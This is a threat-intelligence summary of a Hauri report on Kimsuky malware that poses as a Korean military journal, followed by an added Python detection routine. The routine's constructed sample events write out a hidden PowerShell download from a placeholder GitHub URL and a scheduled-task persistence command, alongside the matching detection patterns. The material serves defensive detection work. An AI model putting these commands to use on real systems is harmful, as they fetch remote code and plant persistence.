Kimsuky Reconnaissance Malware Disguised as a Military and Security Journal

2026-06-29 Hauri Kimsuky Reconnaissance Malware Disguised as a Military and Security Journal

https://hauri.co.kr/security/security_view.html?intSeq=89

Attachments

2026-06-29 report PDF (801 KB) (original Korean filename mangled by encoding)


Kimsuky-linked malware masqueraded as a Korea Institute for Military Affairs monthly military and security publication, using a document-like LNK file to start a staged infection chain. Hauri observed Dropbox and GitHub being abused to host and deliver VBE, batch, and PowerShell components, with the final payload collecting system information, Downloads folder listings, and running process data before uploading results to attacker GitHub infrastructure. The report ties the public Music storage path and the GoogleUpdateTaskMachineUA-style scheduled task name to patterns previously seen in Kimsuky activity, indicating reconnaissance and persistence rather than immediate destructive impact.
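As an added example that is not part of the Hauri report, the following Python triage routine flags the three behaviours the summary describes (script hosts running from the public Music path, a GoogleUpdateTaskMachine-style task that does not point at the real Google updater, and script hosts fetching from Dropbox or GitHub) over constructed process-creation records. The Public\Music location, task names, file names and URLs in the sample data are assumptions, not the report's indicators.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style);
# none of these values come from the Hauri report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //E:vbscript "C:\Users\Public\Music\notice.vbe"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "GoogleUpdateTaskMachineUA" /tr "C:\Users\Public\Music\run.bat" /sc minute /mo 15',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
     "cmdline": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler',
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://raw.githubusercontent.com/EXAMPLE/stage2.txt"',
     "parent": r"C:\Windows\System32\cmd.exe"},
]

# Script hosts the reported chain relies on (VBE, batch and PowerShell stages).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
# Assumed location of the "public Music storage path" named in the summary.
PUBLIC_MUSIC = re.compile(r"\\users\\public\\music\\", re.I)
# Task names mimicking the Google updater; the legitimate task runs GoogleUpdate.exe.
TASK_MIMIC = re.compile(r'/tn\s+"?googleupdatetaskmachine', re.I)
GOOGLE_UPDATER = re.compile(r"\\google\\update\\googleupdate\.exe", re.I)
# Cloud services the report saw abused for staging and result upload.
CLOUD_HOSTS = re.compile(r"https?://(?:www\.)?(dropbox\.com|raw\.githubusercontent\.com|github\.com)/", re.I)


def triage(event):
    """Return the list of reasons an event matches the reported tradecraft."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    reasons = []
    if image in SCRIPT_HOSTS and PUBLIC_MUSIC.search(cmd):
        reasons.append("script host running content from Public\\Music")
    if image == "schtasks.exe" and TASK_MIMIC.search(cmd) and not GOOGLE_UPDATER.search(cmd):
        reasons.append("GoogleUpdateTaskMachine-style task not pointing at GoogleUpdate.exe")
    if image in SCRIPT_HOSTS and CLOUD_HOSTS.search(cmd):
        reasons.append("script host fetching from %s" % CLOUD_HOSTS.search(cmd).group(1))
    return reasons


def scan(events):
    """Map event index -> reasons for every event that triggers at least one rule."""
    return {i: r for i, e in enumerate(events) if (r := triage(e))}


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", "; ".join(reasons))
```

The genuine GoogleUpdate.exe record is left alone, which is the check that keeps this rule from firing on every machine with Chrome installed.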

Indicators of Compromise

